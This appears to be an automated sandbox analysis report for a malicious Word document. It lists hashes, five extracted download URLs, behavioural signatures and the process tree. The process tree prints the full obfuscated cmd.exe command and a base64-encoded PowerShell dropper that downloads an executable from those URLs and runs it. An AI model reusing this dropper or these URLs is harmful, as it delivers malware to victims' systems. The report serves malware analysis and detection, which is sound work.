Analysis
-
max time kernel
52s -
max time network
46s -
platform
windows7_x64 -
resource
win7v200217 -
submitted
15-03-2020 17:25
Static task
static1
Behavioral task
behavioral1
Sample
b8be31db3cf8fa74d86929a303a2ae714fb928211f14b777f4a63f2bd1854929.doc
Resource
win7v200217
General
-
Target
b8be31db3cf8fa74d86929a303a2ae714fb928211f14b777f4a63f2bd1854929.doc
-
Size
84KB
-
MD5
43d2a3df73fdcb10b9429a480d96ddcf
-
SHA1
806d56933c8bb8ec187c0da1be37424582b97801
-
SHA256
b8be31db3cf8fa74d86929a303a2ae714fb928211f14b777f4a63f2bd1854929
-
SHA512
f1443679436643c0177bfa1ab84b72293fa547c622382e03e4de198d13581c93bd854159e2f2e5ed901a6f35d47519c938de601edb0a345fe94252760167ce44
Malware Config
Extracted
http://blog.bctianfu.cn/4
http://mail.vcacademy.lk/5nLo
http://lamemoria.in/2ib2Pt
http://tropicalislandrealtyofflorida.com/NNqM7W
http://businessarbitr.ru/E
Signatures
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid process 1920 cmd.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 1836 wrote to memory of 1920 1836 WINWORD.EXE cmd.exe PID 1836 wrote to memory of 1920 1836 WINWORD.EXE cmd.exe PID 1836 wrote to memory of 1920 1836 WINWORD.EXE cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1996 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1996 powershell.exe 1996 powershell.exe -
Blacklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 4 1996 powershell.exe 6 1996 powershell.exe 8 1996 powershell.exe 10 1996 powershell.exe 12 1996 powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1836 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1836 WINWORD.EXE 1836 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1920 1836 cmd.exe WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b8be31db3cf8fa74d86929a303a2ae714fb928211f14b777f4a63f2bd1854929.doc"1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /v^:^ON^ ^ /c" ^Se^T ^ A^K=A^ACA^gAA^I^A^ACA^gA^A^I^A^AC^A^gAAIA^ACAg^A^AI^A^ACA^gAA^I^A^ACAgAQfA0^H^A7^BA^a^AMG^A0^BQ^Y^AM^GA9^B^w^O^As^GAh^B^QZ^A^I^HAiBwOAc^EAC^B^A^aA^QC^A^g^A^QbA^UG^A^0B^QSA^0CAlBwaA8GA^2B^gb^AkEA^7A^QKAc^E^AC^B^A^a^AQC^A^gAALAU^EAjBw^Q^A^QC^A^oAQZA^wG^A^p^BgR^AQG^Ah^Bwb^AwGAu^B^w^d^A8^G^AE^B^g^L^AE^F^A^zBgQAQCA7^BQ^e^AI^H^A0^Bwe^A^kC^AV^BAcAk^GA^kA^A^IA^4^GAp^B^AI^AU^E^A^jB^w^QA^QC^A^o^A^AaA^MG^A^hB^Q^Z^AIHAv^BgZA^s^DAn^A^QZ^A^g^H^A^lB^g^LAcC^Ar^A^QdAsGAH^BA^JAsC^AnA^A^X^AcCAr^Aw^Y^A^kG^A^sB^gY^AUHA^w^BgO^A^Y^H^A^u^B^Q^Z^A^QC^A^9A^wRA^IEA^oB^A^JAsD^AnAwNAAD^A3^AwJAACA9^AA^IA^U^H^ArBwRA^QCA^7A^QK^AcCA^ABwJA^gCA^0BQaA^wGAw^B^w^U^A4C^AnA^QR^A^8C^A1^Bgc^A^4C^A^yB^A^d^Ak^GA^i^B^gc^A^E^GAzBwc^A^UGAu^BQ^aAM^H^A^1^Bg^Y^A^8CAv^A^g^O^AAHA^0BA^d^A^gG^A^AB^wV^AcD^AN^BQcA^4E^AOBw^L^A0GAv^BwY^A4CAhB^AZA^kGAyBwbAw^G^A^mB^gZ^A8GA^5B^AdA^wGAhBQ^Z^AIH^Ak^Bgb^A^EG^As^BwcAkG^As^B^QY^AMG^ApBAc^A^8G^AyBAdA8CAvA^g^OA^AH^A0^B^A^dAgG^AA^B^A^dAA^FAyA^g^YA^k^GA^y^A^wL^A^4^G^A^pB^gLA^E^GAp^B^gcA8^G^A^tB^Q^Z^A0^GAhBAbA8CAvA^gOAAHA0BA^dA^g^G^A^A^B^wbAw^E^A^u^BQN^A^8CArBAb^A^4CA^5^BQ^b^AU^GA^kBQY^A^MGA^h^B^wY^AYH^Au^AAb^A^k^G^AhB^QbA^8C^Av^AgO^A^AH^A0BA^d^A^gGA^A^B^ANA^8CA^u^BwYA4C^A1B^g^Z^A^4^G^Ah^B^Q^aA^QHA^jBg^YA^4CAn^Bwb^AwG^AiB^w^LA^8C^A^6AAcA^QH^A0^BAa^AcCA9A^QVAA^H^A^p^BAJA^sDA0^BgbA^UGA^p^B^AbA^M^E^AiBQZ^Ac^F^AuAAd^A^U^G^A^O^BAI^A^Q^HAjB^QZAoGA^i^B^w^bA0C^A3B^Q^Z^A4GA9A^QUAMHAC^B^AJ^ ^e- lle^h^sr^ewop&& ^F^oR /^L %^9 ^iN (^ ^ ^ ^965^ ^, ^ ^ -1 ,^ ^ ^0) ^dO ^S^Et G^Fr^1=!G^Fr^1!!A^K:~ %^9, 1!& ^i^F %^9 LsS ^1 cA^l^L %G^Fr^1:^~-^966% "2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Process spawned unexpected child process
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABCAHMAUQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAHAAVQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AYgBjAHQAaQBhAG4AZgB1AC4AYwBuAC8ANABAAGgAdAB0AHAAOgAvAC8AbQBhAGkAbAAuAHYAYwBhAGMAYQBkAGUAbQB5AC4AbABrAC8ANQBuAEwAbwBAAGgAdAB0AHAAOgAvAC8AbABhAG0AZQBtAG8AcgBpAGEALgBpAG4ALwAyAGkAYgAyAFAAdABAAGgAdAB0AHAAOgAvAC8AdAByAG8AcABpAGMAYQBsAGkAcwBsAGEAbgBkAHIAZQBhAGwAdAB5AG8AZgBmAGwAbwByAGkAZABhAC4AYwBvAG0ALwBOAE4AcQBNADcAVwBAAGgAdAB0AHAAOgAvAC8AYgB1AHMAaQBuAGUAcwBzAGEAcgBiAGkAdAByAC4AcgB1AC8ARQAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQARwBrAHUAIAA9ACAAJwA3ADAANwAnADsAJABoAEIARwA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABHAGsAdQArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwBjAEUAIABpAG4AIAAkAGkAcABVACkAewB0AHIAeQB7ACQAQgBzAFEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAQwBjAEUALAAgACQAaABCAEcAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAaABCAEcAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request